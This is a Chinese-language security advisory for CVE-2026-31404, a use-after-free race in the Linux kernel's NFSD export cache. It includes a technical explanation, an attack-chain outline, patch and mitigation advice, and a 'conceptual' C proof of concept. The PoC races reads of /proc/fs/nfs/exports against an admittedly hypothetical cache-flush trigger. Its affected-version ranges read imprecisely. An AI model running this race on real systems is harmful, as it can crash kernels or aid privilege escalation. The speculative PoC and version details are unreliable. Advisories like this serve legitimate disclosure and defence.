CVE-2026-31404 CVSS 7.8 高危

CVE-2026-31404 Linux内核NFSD释放后重用漏洞

披露日期: 2026-04-03

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31404

漏洞类型

释放后重用 (UAF) / 竞态条件

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核NFSD组件存在一个释放后重用漏洞。在svc_export_put()函数中，path_put()和auth_domain_put()在RCU宽限期前被调用，导致当RCU读取器正在访问这些对象时，若发生并发清理，会引发空指针解引用。该漏洞源于资源释放时机不当，攻击者可利用此漏洞造成本地系统崩溃或潜在权限提升。

技术细节

该漏洞发生在Linux内核的NFS服务器（NFSD）模块中。具体而言，`svc_export_put()`函数在释放引用计数时，立即调用`path_put()`和`auth_domain_put()`清理子对象，但这发生在RCU（Read-Copy-Update）宽限期结束之前。此时，`e_show()`或`c_show()`等RCU读取器可能仍通过`seq_path`或`seq_escape`访问`ex_path`或`ex_client->name`。由于之前的补丁仅将`kfree`移入RCU回调，而保留了可能休眠的清理函数在软中断上下文中运行，导致了竞态条件。当`cache_clean`并发移除条目并释放内存时，正在读取的进程将访问已释放的内存，导致空指针解引用。修复方案是使用`queue_rcu_work()`替代`call_rcu`，将延迟回调移至进程上下文执行，从而允许安全的内存释放。

攻击链分析

STEP 1

1. 本地访问

攻击者获取本地低权限用户访问权限。

STEP 2

2. 触发读取

攻击者持续或高频触发对NFS导出信息的读取操作（如读取/proc/fs/nfs/exports），激活RCU读取端临界区。

STEP 3

3. 触发清理

攻击者并发触发NFS导出缓存清理操作，调用svc_export_put()释放资源。

STEP 4

4. 竞态利用

由于资源释放在RCU宽限期前发生，读取线程访问了已释放的内存（ex_path或ex_client），导致内核空指针解引用或UAF，引发系统崩溃或潜在的代码执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * Conceptual PoC for CVE-2026-31404 (Race Condition in NFSD)
 * This code attempts to trigger the race condition by accessing
 * NFS exports while concurrently triggering cache cleanup.
 * Note: Exploitation requires precise timing and specific kernel configuration.
 */

#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <unistd.h>

void *reader_thread(void *arg) {
    while (1) {
        // Simulate RCU reader accessing /proc/fs/nfs/exports
        FILE *fp = fopen("/proc/fs/nfs/exports", "r");
        if (fp) {
            char buffer[256];
            while (fgets(buffer, sizeof(buffer), fp)) {
                // Accessing ex_path and ex_client->name
            }
            fclose(fp);
        }
    }
    return NULL;
}

void *cleaner_thread(void *arg) {
    while (1) {
        // Simulate operations that might trigger svc_export_put()
        // e.g., manipulating exports via nfsd admin tools or sysfs
        system("echo > /proc/fs/nfsd/export_flush"); // Hypothetical trigger
        usleep(100);
    }
    return NULL;
}

int main() {
    pthread_t t1, t2;

    printf("[+] Starting PoC for CVE-2026-31404...\n");

    pthread_create(&t1, NULL, reader_thread, NULL);
    pthread_create(&t2, NULL, cleaner_thread, NULL);

    pthread_join(t1, NULL);
    pthread_join(t2, NULL);

    return 0;
}

影响范围

Linux Kernel < 6.6 (Commit 2829e80d29b627886d12b5ea40856d56b516e67d)

Linux Kernel < 6.1 (Commit 48db892356d6cb80f6942885545de4a6dd8d2a29)

Linux Kernel < 5.15 (Commit f5ab1bec5fa18731e0b1b1e60c9a68667ac73ea2)

防御指南

临时缓解措施

建议立即更新Linux内核至包含该补丁的最新版本。如果无法立即升级，应限制对NFS服务的本地访问权限，并监控系统日志中是否存在与NFSD相关的内核崩溃迹象。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表